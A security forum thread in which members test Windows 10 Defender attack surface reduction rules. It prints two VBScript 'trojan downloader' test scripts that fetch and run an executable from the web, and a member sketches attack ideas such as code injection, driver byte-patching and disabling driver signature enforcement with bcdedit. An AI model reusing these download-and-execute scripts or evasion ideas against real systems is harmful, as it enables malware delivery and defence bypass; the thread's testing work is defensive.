Who has already played with new W10 security features?

Have you enabled and added folders to secure folder access feature?

  • YEs

    Votes: 27 29.7%
  • No

    Votes: 46 50.5%
  • What ??

    Votes: 18 19.8%

  • Total voters
    91

Av Gurus

Level 29
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
Sep 22, 2014
1,767
Thanks. :)
If I correctly read your attachment, then the scripts (RunNotepad.vbs, RunPowerShell.vbs)successfully ran the executables (notepad.exe, powershell.exe), and next, Defender recognized the RunPowerSell.vbs script as dangerous and put it in Quarantine.
If so, then indeed, the executables that are already on the disk are not blocked by this ASR rule (D3E037E1-3EB8-44C8-A917-57927947596D). Your malware test suggests, that the rule is activated when the script can download executable to the disk and tries to execute it. That is a good news.
Anyway, your Defender settings are somewhat more aggressive, because I can run the same script with no Defender intervention.
Could you post the Defender details about the quarantined script (or details from Windows Event Viewer)?
This would help to ensure everyone, that ASR rules have nothing to do with detecting the RunPowerSell.vbs script.

I can't find anything in WD accept I already post it in last msg.
In Event Viewer also can't find nothing, maybe you can tell me where to look?

ev.jpg
 
  • Like
Reactions: AtlBo

Andy Ful

From Hard_Configurator Tools
Verified
Honorary Member
Top Poster
Developer
Well-known
Dec 23, 2014
8,593
Yep, who needs documentation when you can just brute force everything? I have 0 knowledge of what any of the exploit protection settings does, I just enable everything and then disable 1 by 1, eventually I'll find the settings which are causing an error when you try to start the program and then I can enable all the other ones, easy as ***, just gotta verify the program works as intended after that, microsoft should hire me :whistle:
Yes, that is easy for individual setup. :)
Things may be more complicated, when one wants to find out the setup for the average users. :(
 

Andy Ful

From Hard_Configurator Tools
Verified
Honorary Member
Top Poster
Developer
Well-known
Dec 23, 2014
8,593
I can't find anything in WD accept I already post it in last msg.
In Event Viewer also can't find nothing, maybe you can tell me where to look?

View attachment 174498
I assume that you checked EventId=1121 in the Event Viewer, like you did with malware samples. Because this event was absent, then the script was not detected/blocked by ASR rules. Have you activated Advanced Threat Protection?
 
Last edited:
  • Like
Reactions: AtlBo and Av Gurus

Av Gurus

Level 29
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
Sep 22, 2014
1,767
All settings is the same like in test (this is test pc).
ATP protection, not sure...
 
  • Like
Reactions: AtlBo

Andy Ful

From Hard_Configurator Tools
Verified
Honorary Member
Top Poster
Developer
Well-known
Dec 23, 2014
8,593
@Av Gurus, please run this script (see also the attachement RunRemoteSumo.txt):
Code:
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run("c:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noprofile -command (New-Object System.Net.WebClient).DownloadFile('https://kcsoftwares.com/files/sumo_lite.exe','C:\Users\Public\Downloads\sumo_lite.exe')")
WScript.Sleep(10000)
WshShell.Run("C:\Users\Public\Downloads\sumo_lite.exe")
WScript.Quit
The above VBScript is an example of trojan downloader (not malicious). It uses PowerShell to download sumo_lite.exe from developer's website, waits 10 seconds and executes sumo_lite.exe. I can run this script successfully despite activated ASR.
 

Attachments

  • RunRemoteSumo.txt
    373 bytes · Views: 547
D

Deleted member 65228

@Sunshine-boy The test will be over before you know it. PC Hunter will be able to access any directory regardless of whether it is protected or not from kernel-mode if its intentionally trying to bypass such mitigations. The only exception would be byte-patching the PC Hunter driver in memory (which would require the offender to be also executing in kernel-mode to access the memory for write or deploy a zero-day exploit for a vulnerability to find a way to change the memory) or intercepting kernel-mode routines in a way that PC Hunter won't be able to surpass without updates to specifically bypass the patch technique.

One exception could be:
1. PC Hunter starts up (the user-mode process).
2. An attacker injects code into the PC Hunter user-mode process
3. The injected code sets various API hooks but also hides the presence of the hook by controlling memory read operations and spoofing the bytes which were originally present at the memory of the hooked APIs to conceal evidence of the targeted functions being patched (similar to how an old banking malware from around 2012 I believe spoofed the MBR after infecting it which managed to fool many researchers for awhile).
4. When the user attempts to run a scan with PC Hunter by controlling the GUI -> the malicious code forces it to fake a scan instead of actually communicating with its device driver.
5. The user is given fake results however since no communication was made to the driver in the first place although no one is aware of this except the attacker, this resulted in protected/hidden directories/files never being touched/found in the first place.

Byte-patching method of the driver dynamically would allow you to have your own opcodes executed when targeted stubs are executed in its driver; this could be abused to force-whitelist/force-ignore specific processes, registry keys/registry key values and files.

Bear in mind that all of this is extremely unrealistic because the attacker would need to have real experience with doing these things, and would need to keep it updated and maintained for updates of the software to keep it working correctly. However, the byte-patch method I have just mentioned reminds me to what NSA did with DoublePulsar payload for srv.sys (they found the base address of the driver and then performed a mathematical calculation from the base address to locate the address of an dispatch table (which is basically just an array) which contained pointer addresses, and since they had the ability to change the memory, they did exactly that to control things related to SMB (and thus when the patch was triggered, the malicious code was executed instead of the genuine code beforehand/entirely). Therefore that is validation that the technique does actually work and can be applied if an attacker knew enough and was determined enough to go to such lengths.

Anyway, you'll just be wasting time trying to see what can outsmart PC Hunter haha. I doubt you'll find anything for protecting directories/files and what-not which won't be surpassed hahaha.
 
D

Deleted member 65228

Hahahahaha. Sorry I didn't mean to just shove a ton of info on you like that. Well basically to make it easier for you to understand what I mean, the best thing you can do is just try to cut PC Hunter's legs off by blocking the driver installation :)

This is what Avast does to the Process Hacker driver when you have self-protection enabled. Try and open Process Hacker with the driver enabled while Avast SP is enabled and it'll be blocked from driving loading. They did this because they don't like how the PH driver is used to terminate even their own processes. They just cut off the legs by blocking kprocesshacker.sys
 

Sunshine-boy

Level 28
Verified
Top Poster
Well-known
Apr 1, 2017
1,782
Many thanks. both Comodo and Eset hips will ask for the third party drivers! better prevent than detect:notworthy: btw this story is true if you have doubt about that driver so you will block it!.but if I have a safe and well-known software which bundles with malicious and dig signed driver then I will allow it! because there is no reason to block it!
 
  • Like
Reactions: AtlBo

Sunshine-boy

Level 28
Verified
Top Poster
Well-known
Apr 1, 2017
1,782
What does that mean?I think Pc hunter driver is signed!isnt?not sure.but it doesn't matter I just wanted to see if Microsoft can block this ... and opcode said no so it cant.
 
  • Like
Reactions: AtlBo
D

Deleted member 65228

If the driver isn't signed then you'll have to enable Test Mode (and then reboot) or go into boot options and disable verification enforcement for that one boot session. Whereas Test Mode enabled it permanently until you disable it and then reboot. I am surprised that malware hasn't yet abused this in the wild (I don't think it has yet at-least) by just spawning bcdedit.exe with the correct arguments to disable TESTSIGNING -> unsigned driver starts at boot early due to boot group order -> bam now you get hit with a crazy kernel mode ransomware payload LOL. Unrealistic I am just kidding hahaha

Don't enable Test Mode though unless you are aware of the security risks and know what you're doing because it will leave you in a more vulnerable scenario
 

Av Gurus

Level 29
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
Sep 22, 2014
1,767
@Av Gurus, please run this script (see also the attachement RunRemoteSumo.txt):
Code:
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run("c:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noprofile -command (New-Object System.Net.WebClient).DownloadFile('https://kcsoftwares.com/files/sumo_lite.exe','C:\Users\Public\Downloads\sumo_lite.exe')")
WScript.Sleep(10000)
WshShell.Run("C:\Users\Public\Downloads\sumo_lite.exe")
WScript.Quit
The above VBScript is an example of trojan downloader (not malicious). It uses PowerShell to download sumo_lite.exe from developer's website, waits 10 seconds and executes sumo_lite.exe. I can run this script successfully despite activated ASR.

I will try when come back home...about 22h...if not then tomorow...
 
  • Like
Reactions: AtlBo and Andy Ful

Andy Ful

From Hard_Configurator Tools
Verified
Honorary Member
Top Poster
Developer
Well-known
Dec 23, 2014
8,593
What does that mean?I think Pc hunter driver is signed!isnt?not sure.but it doesn't matter I just wanted to see if Microsoft can block this ... and opcode said no so it cant.
Did you run PC Hunter on your computer? I used it on Windows 8.1 - it is very powerful as Opcode said. If I remember correctly it uses the mini-filter driver (kernel mode driver).
There are many versions of PC Hunter, some are signed by 'WoSign eCommerce Services Limited', some not.
https://www.reasoncoresecurity.com/pchunter64.exe-50397414d48b461dd80055accc70d6edb6169d7a.aspx
I did not see the version signed by Microsoft, so the driver will not be loaded due to Signed Driver Enforcement.
It could work in early Windows 10 versions.
 

Andy Ful

From Hard_Configurator Tools
Verified
Honorary Member
Top Poster
Developer
Well-known
Dec 23, 2014
8,593
I tested another trojan downloader (not malicious) against ASR.
Code:
dim mXMLHTTP: Set mXMLHTTP = CreateObject("Microsoft.XMLHTTP")
dim aStream: Set aStream = CreateObject("Adodb.Stream")
mXMLHTTP.Open "GET", "https://kcsoftwares.com/files/sumo_lite.exe", False
mXMLHTTP.Send
with aStream
    .type = 1 '//binary
    .open
    .write mXMLHTTP.ResponseBody
    .savetofile "C:\Users\Public\Downloads\sumo_lite.exe", 2 '//overwrite
end with
WScript.Sleep(10000)
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run("C:\Users\Public\Downloads\sumo_lite.exe")
WScript.Quit
This is functionally the same script as in my previous post Poll - Who has already played with new W10 security features?, but without using PowerShell, the XMLHTTP and ADODB.Stream objects were adopted instead.
After I created the above script it was quarantined by Defender. So, I restored it from the Quarantine and tried to run. This time the script was stopped by ASR rule D3E037E1-3EB8-44C8-A917-57927947596D.:)
 
  • Like
Reactions: AtlBo and Av Gurus

Av Gurus

Level 29
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
Sep 22, 2014
1,767
@Av Gurus, please run this script (see also the attachement RunRemoteSumo.txt):
Code:
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run("c:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noprofile -command (New-Object System.Net.WebClient).DownloadFile('https://kcsoftwares.com/files/sumo_lite.exe','C:\Users\Public\Downloads\sumo_lite.exe')")
WScript.Sleep(10000)
WshShell.Run("C:\Users\Public\Downloads\sumo_lite.exe")
WScript.Quit
The above VBScript is an example of trojan downloader (not malicious). It uses PowerShell to download sumo_lite.exe from developer's website, waits 10 seconds and executes sumo_lite.exe. I can run this script successfully despite activated ASR.

Here is the test.
I run that .vbs and WDSC block & quarantine file but can't find anything in EV for ASR.
Here are pictures:

1.jpg 2.jpg
 
  • Like
Reactions: AtlBo

About us

  • MalwareTips is a community-driven platform providing the latest information and resources on malware and cyber threats. Our team of experienced professionals and passionate volunteers work to keep the internet safe and secure. We provide accurate, up-to-date information and strive to build a strong and supportive community dedicated to cybersecurity.

User Menu

Follow us

Follow us on Facebook or Twitter to know first about the latest cybersecurity incidents and malware threats.

Top